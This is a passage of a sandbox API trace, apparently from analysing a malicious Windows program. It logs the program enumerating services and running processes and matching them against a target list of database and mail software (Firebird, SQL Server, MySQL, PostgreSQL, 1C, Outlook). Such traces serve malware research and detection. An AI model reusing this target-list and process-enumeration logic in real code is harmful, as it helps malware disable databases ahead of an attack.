	[0170.716] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0170.716] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0170.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0170.716] lstrlenW (lpString="eventlog") returned 8
	[0170.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0170.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0170.716] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0170.716] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0170.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0170.716] lstrlenW (lpString="EventSystem") returned 11
	[0170.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0170.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0170.716] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0170.716] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0170.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0170.716] lstrlenW (lpString="gpsvc") returned 5
	[0170.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0170.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0170.716] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0170.716] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0170.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0170.716] lstrlenW (lpString="iphlpsvc") returned 8
	[0170.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0170.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0170.716] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0170.716] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0170.716] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0170.716] lstrlenW (lpString="LanmanServer") returned 12
	[0170.716] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0170.716] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0170.717] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0170.717] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0170.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0170.717] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0170.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0170.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0170.717] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0170.717] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0170.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0170.717] lstrlenW (lpString="lmhosts") returned 7
	[0170.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0170.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0170.717] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0170.717] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0170.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0170.717] lstrlenW (lpString="MMCSS") returned 5
	[0170.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0170.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0170.717] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0170.717] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0170.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0170.717] lstrlenW (lpString="MpsSvc") returned 6
	[0170.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0170.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0170.717] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0170.717] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0170.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0170.717] lstrlenW (lpString="Netman") returned 6
	[0170.717] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0170.717] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0170.717] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0170.717] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0170.717] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0170.717] lstrlenW (lpString="netprofm") returned 8
	[0170.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0170.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0170.718] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0170.718] lstrlenW (lpString="NlaSvc") returned 6
	[0170.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0170.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0170.718] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0170.718] lstrlenW (lpString="nsi") returned 3
	[0170.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0170.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0170.718] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0170.718] lstrlenW (lpString="PcaSvc") returned 6
	[0170.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0170.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0170.718] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0170.718] lstrlenW (lpString="PlugPlay") returned 8
	[0170.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0170.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0170.718] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0170.718] lstrlenW (lpString="Power") returned 5
	[0170.718] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0170.718] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0170.718] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0170.719] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0170.719] lstrlenW (lpString="ProfSvc") returned 7
	[0170.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0170.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0170.719] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0170.719] lstrlenW (lpString="RpcEptMapper") returned 12
	[0170.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0170.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0170.719] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0170.719] lstrlenW (lpString="RpcSs") returned 5
	[0170.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0170.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0170.719] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0170.719] lstrlenW (lpString="SamSs") returned 5
	[0170.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0170.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0170.719] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0170.719] lstrlenW (lpString="Schedule") returned 8
	[0170.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0170.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0170.719] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0170.719] lstrlenW (lpString="SENS") returned 4
	[0170.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0170.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0170.719] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0170.720] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0170.720] lstrlenW (lpString="ShellHWDetection") returned 16
	[0170.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0170.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0170.720] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0170.720] lstrlenW (lpString="Spooler") returned 7
	[0170.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0170.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0170.720] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0170.720] lstrlenW (lpString="SysMain") returned 7
	[0170.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0170.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0170.720] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0170.720] lstrlenW (lpString="Themes") returned 6
	[0170.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0170.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0170.720] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0170.720] lstrlenW (lpString="TrkWks") returned 6
	[0170.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0170.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0170.720] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0170.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0170.720] lstrlenW (lpString="UxSms") returned 5
	[0170.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0170.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0170.721] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0170.721] lstrlenW (lpString="WdiServiceHost") returned 14
	[0170.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0170.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0170.721] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0170.721] lstrlenW (lpString="WdiSystemHost") returned 13
	[0170.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0170.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0170.721] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0170.721] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0170.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.721] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0170.721] lstrlenW (lpString="Winmgmt") returned 7
	[0170.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0170.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0170.721] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0170.721] lstrlenW (lpString="WPDBusEnum") returned 10
	[0170.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0170.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0170.721] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0170.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0170.721] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb617698 | out: hHeap=0x7ab0000) returned 1
	[0170.721] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x354
	[0170.724] Process32FirstW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0170.724] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0170.724] lstrlenW (lpString="System") returned 6
	[0170.724] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0170.724] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0170.724] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0170.724] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0170.724] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0170.724] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0170.724] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0170.725] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0170.725] lstrlenW (lpString="smss.exe") returned 8
	[0170.725] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0170.725] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0170.725] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0170.725] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0170.725] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0170.725] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0170.725] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0170.725] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0170.725] lstrlenW (lpString="csrss.exe") returned 9
	[0170.725] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0170.725] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0170.726] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0170.726] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0170.726] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0170.726] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0170.726] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0170.726] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0170.726] lstrlenW (lpString="wininit.exe") returned 11
	[0170.726] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0170.726] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0170.726] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0170.726] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0170.726] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0170.726] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0170.726] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0170.726] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0170.727] lstrlenW (lpString="csrss.exe") returned 9
	[0170.727] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0170.727] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0170.727] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0170.727] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0170.727] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0170.727] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0170.727] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0170.727] lstrlenW (lpString="winlogon.exe") returned 12
	[0170.727] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0170.728] lstrlenW (lpString="services.exe") returned 12
	[0170.728] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0170.728] lstrlenW (lpString="lsass.exe") returned 9
	[0170.728] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0170.729] lstrlenW (lpString="lsm.exe") returned 7
	[0170.729] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.729] lstrlenW (lpString="svchost.exe") returned 11
	[0170.729] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.729] lstrlenW (lpString="svchost.exe") returned 11
	[0170.729] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.730] lstrlenW (lpString="svchost.exe") returned 11
	[0170.730] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.730] lstrlenW (lpString="svchost.exe") returned 11
	[0170.730] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.730] lstrlenW (lpString="svchost.exe") returned 11
	[0170.730] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0170.731] lstrlenW (lpString="audiodg.exe") returned 11
	[0170.731] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.731] lstrlenW (lpString="svchost.exe") returned 11
	[0170.731] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.731] lstrlenW (lpString="svchost.exe") returned 11
	[0170.731] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0170.732] lstrlenW (lpString="spoolsv.exe") returned 11
	[0170.732] Process32NextW (in: hSnapshot=0x354, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0170.732] lstrlenW (lpString="svchost.exe") returned 11
